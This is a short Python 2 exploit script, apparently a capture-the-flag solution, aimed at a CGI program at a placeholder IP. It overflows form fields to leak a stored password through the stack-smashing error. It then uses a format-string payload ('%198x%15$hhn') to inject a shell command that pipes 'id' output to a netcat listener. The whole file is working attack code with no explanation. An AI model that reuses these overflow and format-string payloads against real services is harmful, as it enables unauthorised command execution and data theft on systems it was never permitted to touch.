exploit.py

import requests
from urllib import urlencode
from struct import pack, unpack

URL = 'http://1.2.3.4/cgi-bin/nanana'

def leak(address):
    address = pack('I', address)
    address = address.strip('\x00')

    payload = {
        'username': 'A'*349, 
        'password': 'B'*380, 
        'job': 'C'*392 + address
    }
    r = requests.get(URL+'?'+urlencode(payload))
    l = r.headers['*** stack smashing detected ***']
    l = l.strip(' terminated')
    l = l.ljust(8, '\x00')
    try:
        return unpack('Q', l)
    except:
        return l

def e(cmd, pwd):
    payload = {
        'username': cmd, 
        'password': pwd, 
        'job': '\x48\x10\x60', 
        'action': '%198x%15$hhn'
    }
    print urlencode(payload)
    r = requests.get(URL+'?'+urlencode(payload))

if __name__ == '__main__':

    pwd = leak(0x601090)
    print 'pwd @ %s' % pwd

    e('id | nc 127.0.0.1 12345',pwd=pwd)